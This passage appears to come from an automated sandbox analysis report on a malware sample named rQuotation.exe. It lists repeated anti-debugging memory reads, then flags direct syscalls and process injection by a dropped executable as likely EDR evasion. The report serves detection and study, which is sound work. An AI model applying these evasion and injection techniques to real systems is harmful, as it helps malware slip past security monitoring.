              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D260B mov eax, dword ptr fs:[00000030h]0_2_016D260B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D260B mov eax, dword ptr fs:[00000030h]0_2_016D260B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D260B mov eax, dword ptr fs:[00000030h]0_2_016D260B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D260B mov eax, dword ptr fs:[00000030h]0_2_016D260B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D260B mov eax, dword ptr fs:[00000030h]0_2_016D260B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702619 mov eax, dword ptr fs:[00000030h]0_2_01702619
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E609 mov eax, dword ptr fs:[00000030h]0_2_0173E609
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E6F2 mov eax, dword ptr fs:[00000030h]0_2_0173E6F2
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E6F2 mov eax, dword ptr fs:[00000030h]0_2_0173E6F2
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E6F2 mov eax, dword ptr fs:[00000030h]0_2_0173E6F2
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E6F2 mov eax, dword ptr fs:[00000030h]0_2_0173E6F2
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017406F1 mov eax, dword ptr fs:[00000030h]0_2_017406F1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017406F1 mov eax, dword ptr fs:[00000030h]0_2_017406F1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA6C7 mov ebx, dword ptr fs:[00000030h]0_2_016FA6C7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA6C7 mov eax, dword ptr fs:[00000030h]0_2_016FA6C7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC6A6 mov eax, dword ptr fs:[00000030h]0_2_016FC6A6
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F66B0 mov eax, dword ptr fs:[00000030h]0_2_016F66B0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4690 mov eax, dword ptr fs:[00000030h]0_2_016C4690
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4690 mov eax, dword ptr fs:[00000030h]0_2_016C4690
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174C97C mov eax, dword ptr fs:[00000030h]0_2_0174C97C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E6962 mov eax, dword ptr fs:[00000030h]0_2_016E6962
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E6962 mov eax, dword ptr fs:[00000030h]0_2_016E6962
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E6962 mov eax, dword ptr fs:[00000030h]0_2_016E6962
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01764978 mov eax, dword ptr fs:[00000030h]0_2_01764978
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01764978 mov eax, dword ptr fs:[00000030h]0_2_01764978
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0170096E mov eax, dword ptr fs:[00000030h]0_2_0170096E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0170096E mov edx, dword ptr fs:[00000030h]0_2_0170096E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0170096E mov eax, dword ptr fs:[00000030h]0_2_0170096E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01740946 mov eax, dword ptr fs:[00000030h]0_2_01740946
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794940 mov eax, dword ptr fs:[00000030h]0_2_01794940
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174892A mov eax, dword ptr fs:[00000030h]0_2_0174892A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0175892B mov eax, dword ptr fs:[00000030h]0_2_0175892B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174C912 mov eax, dword ptr fs:[00000030h]0_2_0174C912
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B8918 mov eax, dword ptr fs:[00000030h]0_2_016B8918
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B8918 mov eax, dword ptr fs:[00000030h]0_2_016B8918
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E908 mov eax, dword ptr fs:[00000030h]0_2_0173E908
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E908 mov eax, dword ptr fs:[00000030h]0_2_0173E908
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174E9E0 mov eax, dword ptr fs:[00000030h]0_2_0174E9E0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F29F9 mov eax, dword ptr fs:[00000030h]0_2_016F29F9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F29F9 mov eax, dword ptr fs:[00000030h]0_2_016F29F9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178A9D3 mov eax, dword ptr fs:[00000030h]0_2_0178A9D3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017569C0 mov eax, dword ptr fs:[00000030h]0_2_017569C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA9D0 mov eax, dword ptr fs:[00000030h]0_2_016CA9D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA9D0 mov eax, dword ptr fs:[00000030h]0_2_016CA9D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA9D0 mov eax, dword ptr fs:[00000030h]0_2_016CA9D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA9D0 mov eax, dword ptr fs:[00000030h]0_2_016CA9D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA9D0 mov eax, dword ptr fs:[00000030h]0_2_016CA9D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA9D0 mov eax, dword ptr fs:[00000030h]0_2_016CA9D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F49D0 mov eax, dword ptr fs:[00000030h]0_2_016F49D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C09AD mov eax, dword ptr fs:[00000030h]0_2_016C09AD
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C09AD mov eax, dword ptr fs:[00000030h]0_2_016C09AD
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017489B3 mov esi, dword ptr fs:[00000030h]0_2_017489B3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017489B3 mov eax, dword ptr fs:[00000030h]0_2_017489B3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017489B3 mov eax, dword ptr fs:[00000030h]0_2_017489B3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D29A0 mov eax, dword ptr fs:[00000030h]0_2_016D29A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01756870 mov eax, dword ptr fs:[00000030h]0_2_01756870
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01756870 mov eax, dword ptr fs:[00000030h]0_2_01756870
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174E872 mov eax, dword ptr fs:[00000030h]0_2_0174E872
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174E872 mov eax, dword ptr fs:[00000030h]0_2_0174E872
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D2840 mov ecx, dword ptr fs:[00000030h]0_2_016D2840
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4859 mov eax, dword ptr fs:[00000030h]0_2_016C4859
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4859 mov eax, dword ptr fs:[00000030h]0_2_016C4859
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F0854 mov eax, dword ptr fs:[00000030h]0_2_016F0854
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176483A mov eax, dword ptr fs:[00000030h]0_2_0176483A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176483A mov eax, dword ptr fs:[00000030h]0_2_0176483A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E2835 mov eax, dword ptr fs:[00000030h]0_2_016E2835
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E2835 mov eax, dword ptr fs:[00000030h]0_2_016E2835
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E2835 mov eax, dword ptr fs:[00000030h]0_2_016E2835
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E2835 mov ecx, dword ptr fs:[00000030h]0_2_016E2835
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E2835 mov eax, dword ptr fs:[00000030h]0_2_016E2835
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E2835 mov eax, dword ptr fs:[00000030h]0_2_016E2835
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA830 mov eax, dword ptr fs:[00000030h]0_2_016FA830
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174C810 mov eax, dword ptr fs:[00000030h]0_2_0174C810
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC8F9 mov eax, dword ptr fs:[00000030h]0_2_016FC8F9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC8F9 mov eax, dword ptr fs:[00000030h]0_2_016FC8F9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178A8E4 mov eax, dword ptr fs:[00000030h]0_2_0178A8E4
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE8C0 mov eax, dword ptr fs:[00000030h]0_2_016EE8C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017908C0 mov eax, dword ptr fs:[00000030h]0_2_017908C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174C89D mov eax, dword ptr fs:[00000030h]0_2_0174C89D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0887 mov eax, dword ptr fs:[00000030h]0_2_016C0887
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BCB7E mov eax, dword ptr fs:[00000030h]0_2_016BCB7E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176EB50 mov eax, dword ptr fs:[00000030h]0_2_0176EB50
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01792B57 mov eax, dword ptr fs:[00000030h]0_2_01792B57
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01792B57 mov eax, dword ptr fs:[00000030h]0_2_01792B57
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01792B57 mov eax, dword ptr fs:[00000030h]0_2_01792B57
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01792B57 mov eax, dword ptr fs:[00000030h]0_2_01792B57
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01768B42 mov eax, dword ptr fs:[00000030h]0_2_01768B42
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01756B40 mov eax, dword ptr fs:[00000030h]0_2_01756B40
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01756B40 mov eax, dword ptr fs:[00000030h]0_2_01756B40
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178AB40 mov eax, dword ptr fs:[00000030h]0_2_0178AB40
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B8B50 mov eax, dword ptr fs:[00000030h]0_2_016B8B50
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01774B4B mov eax, dword ptr fs:[00000030h]0_2_01774B4B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01774B4B mov eax, dword ptr fs:[00000030h]0_2_01774B4B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EEB20 mov eax, dword ptr fs:[00000030h]0_2_016EEB20
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EEB20 mov eax, dword ptr fs:[00000030h]0_2_016EEB20
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01788B28 mov eax, dword ptr fs:[00000030h]0_2_01788B28
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01788B28 mov eax, dword ptr fs:[00000030h]0_2_01788B28
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173EB1D mov eax, dword ptr fs:[00000030h]0_2_0173EB1D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173EB1D mov eax, dword ptr fs:[00000030h]0_2_0173EB1D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173EB1D mov eax, dword ptr fs:[00000030h]0_2_0173EB1D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173EB1D mov eax, dword ptr fs:[00000030h]0_2_0173EB1D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173EB1D mov eax, dword ptr fs:[00000030h]0_2_0173EB1D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173EB1D mov eax, dword ptr fs:[00000030h]0_2_0173EB1D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173EB1D mov eax, dword ptr fs:[00000030h]0_2_0173EB1D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173EB1D mov eax, dword ptr fs:[00000030h]0_2_0173EB1D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173EB1D mov eax, dword ptr fs:[00000030h]0_2_0173EB1D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794B00 mov eax, dword ptr fs:[00000030h]0_2_01794B00
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174CBF0 mov eax, dword ptr fs:[00000030h]0_2_0174CBF0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EEBFC mov eax, dword ptr fs:[00000030h]0_2_016EEBFC
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8BF0 mov eax, dword ptr fs:[00000030h]0_2_016C8BF0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8BF0 mov eax, dword ptr fs:[00000030h]0_2_016C8BF0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8BF0 mov eax, dword ptr fs:[00000030h]0_2_016C8BF0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0BCD mov eax, dword ptr fs:[00000030h]0_2_016C0BCD
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0BCD mov eax, dword ptr fs:[00000030h]0_2_016C0BCD
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0BCD mov eax, dword ptr fs:[00000030h]0_2_016C0BCD
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E0BCB mov eax, dword ptr fs:[00000030h]0_2_016E0BCB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E0BCB mov eax, dword ptr fs:[00000030h]0_2_016E0BCB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E0BCB mov eax, dword ptr fs:[00000030h]0_2_016E0BCB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176EBD0 mov eax, dword ptr fs:[00000030h]0_2_0176EBD0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01774BB0 mov eax, dword ptr fs:[00000030h]0_2_01774BB0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01774BB0 mov eax, dword ptr fs:[00000030h]0_2_01774BB0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0BBE mov eax, dword ptr fs:[00000030h]0_2_016D0BBE
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0BBE mov eax, dword ptr fs:[00000030h]0_2_016D0BBE
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FCA6F mov eax, dword ptr fs:[00000030h]0_2_016FCA6F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FCA6F mov eax, dword ptr fs:[00000030h]0_2_016FCA6F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FCA6F mov eax, dword ptr fs:[00000030h]0_2_016FCA6F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173CA72 mov eax, dword ptr fs:[00000030h]0_2_0173CA72
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173CA72 mov eax, dword ptr fs:[00000030h]0_2_0173CA72
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176EA60 mov eax, dword ptr fs:[00000030h]0_2_0176EA60
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0A5B mov eax, dword ptr fs:[00000030h]0_2_016D0A5B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0A5B mov eax, dword ptr fs:[00000030h]0_2_016D0A5B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6A50 mov eax, dword ptr fs:[00000030h]0_2_016C6A50
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6A50 mov eax, dword ptr fs:[00000030h]0_2_016C6A50
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6A50 mov eax, dword ptr fs:[00000030h]0_2_016C6A50
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6A50 mov eax, dword ptr fs:[00000030h]0_2_016C6A50
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6A50 mov eax, dword ptr fs:[00000030h]0_2_016C6A50
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6A50 mov eax, dword ptr fs:[00000030h]0_2_016C6A50
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6A50 mov eax, dword ptr fs:[00000030h]0_2_016C6A50
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EEA2E mov eax, dword ptr fs:[00000030h]0_2_016EEA2E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FCA24 mov eax, dword ptr fs:[00000030h]0_2_016FCA24
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E4A35 mov eax, dword ptr fs:[00000030h]0_2_016E4A35
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E4A35 mov eax, dword ptr fs:[00000030h]0_2_016E4A35
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174CA11 mov eax, dword ptr fs:[00000030h]0_2_0174CA11
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FAAEE mov eax, dword ptr fs:[00000030h]0_2_016FAAEE
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FAAEE mov eax, dword ptr fs:[00000030h]0_2_016FAAEE
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C0AD0 mov eax, dword ptr fs:[00000030h]0_2_016C0AD0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01716ACC mov eax, dword ptr fs:[00000030h]0_2_01716ACC
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01716ACC mov eax, dword ptr fs:[00000030h]0_2_01716ACC
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01716ACC mov eax, dword ptr fs:[00000030h]0_2_01716ACC
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F4AD0 mov eax, dword ptr fs:[00000030h]0_2_016F4AD0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F4AD0 mov eax, dword ptr fs:[00000030h]0_2_016F4AD0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8AA0 mov eax, dword ptr fs:[00000030h]0_2_016C8AA0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8AA0 mov eax, dword ptr fs:[00000030h]0_2_016C8AA0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01716AA4 mov eax, dword ptr fs:[00000030h]0_2_01716AA4
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CEA80 mov eax, dword ptr fs:[00000030h]0_2_016CEA80
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CEA80 mov eax, dword ptr fs:[00000030h]0_2_016CEA80

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
              Maps a DLL or memory area into another process
